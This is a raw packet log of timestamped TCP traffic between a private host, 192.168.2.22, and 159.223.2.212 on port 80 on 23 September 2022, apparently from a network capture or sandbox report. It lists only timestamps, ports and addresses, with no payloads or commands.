Sep 23, 2022 08:13:02.019217968 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019222975 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019248009 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019289017 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019296885 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019330025 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019336939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019376993 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019398928 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019438982 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019444942 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019479036 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019490957 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019519091 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019526958 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019557953 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019567013 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019598007 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019604921 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019638062 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019645929 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019675970 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019690037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019715071 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019721031 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019753933 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019762039 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019793987 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019799948 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019851923 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019854069 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019893885 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019898891 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019932032 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019938946 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019972086 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019978046 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.020010948 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.020020008 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.020050049 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.020059109 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.020088911 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.020096064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.020128965 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.020138025 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.020175934 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026215076 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026308060 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026348114 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026388884 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026398897 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026417017 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026429892 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026432991 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026438951 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026469946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026485920 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026509047 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026527882 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026549101 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026562929 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026590109 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026606083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026629925 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026645899 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026669979 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026686907 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026709080 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026727915 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026747942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026767015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026787043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026798010 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026828051 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026843071 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026866913 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026879072 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026909113 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026918888 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026947975 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026963949 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.026987076 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.026997089 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027028084 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027039051 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027066946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027080059 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027107000 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027115107 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027146101 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027179003 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027189970 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027190924 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027230978 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027242899 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027268887 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027282953 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027308941 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027318954 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027365923 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027369022 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027419090 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027425051 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027456999 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027477026 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027498960 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027517080 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027539968 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027564049 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027580023 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027594090 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027621984 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027635098 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027661085 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027673006 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027708054 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027723074 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027748108 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027756929 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027786970 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027800083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027827024 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027837992 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027867079 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027879000 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027906895 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027918100 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027949095 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.027959108 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.027987003 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028000116 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028028011 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028033972 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028069019 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028079033 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028106928 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028120995 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028146029 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028157949 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028187990 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028199911 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028228998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028239965 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028270960 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028281927 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028309107 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028328896 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028348923 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028362989 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028388023 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028405905 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028425932 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028440952 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028465986 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028476954 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028506041 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028516054 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028547049 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028558016 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028588057 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028599024 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028628111 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028637886 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028666973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028680086 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028707981 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028719902 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028745890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028760910 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028795004 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028800011 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028839111 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028851986 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028877974 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028887987 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028918028 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028951883 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028956890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.028960943 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.028996944 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.029007912 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.029043913 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.029048920 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.029066086 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.029097080 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.029105902 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.029108047 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.029145956 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.029176950 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.029263973 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031147957 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031186104 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031218052 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031229019 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031250000 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031260014 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031264067 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031281948 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031296015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031315088 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031328917 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031363010 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031394958 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031430960 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031455994 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031478882 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031511068 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031527042 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031544924 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031557083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031562090 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031578064 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031590939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031610012 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031621933 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031640053 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031656027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031672955 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031685114 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031702995 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031718969 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031867981 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031892061 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031899929 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031902075 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031932116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031945944 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031964064 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.031976938 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.031997919 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.032011986 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.032042027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050220013 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050266981 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050307035 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050344944 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050353050 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050384998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050388098 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050395012 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050400019 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050427914 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050446987 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050466061 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050481081 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050507069 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050520897 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050548077 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050559998 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050587893 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050601006 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050626993 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050638914 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050667048 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050678015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050708055 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050720930 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050750017 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050762892 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050789118 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050801039 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050828934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050837994 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050868988 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050882101 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050908089 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050919056 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050946951 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.050959110 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.050987005 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051002026 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051028013 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051039934 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051069021 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051079035 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051107883 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051120043 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051147938 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051161051 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051191092 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051202059 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051230907 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051244020 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051270962 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051284075 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051310062 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051321983 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051368952 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051379919 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051422119 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051440001 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051461935 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051474094 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051500082 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051516056 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051539898 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051552057 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051579952 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051592112 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051619053 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051632881 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051656961 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051672935 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051697016 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051737070 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051754951 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051779032 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051783085 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051793098 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051817894 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051830053 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051858902 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051872015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051898956 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051911116 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051939011 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051950932 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.051979065 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.051989079 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052018881 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.052031994 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052059889 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.052072048 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052100897 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.052114010 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052140951 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.052154064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052184105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.052197933 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052223921 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.052237034 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.052275896 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.055793047 CEST	49171	80	192.168.2.22	159.223.2.212
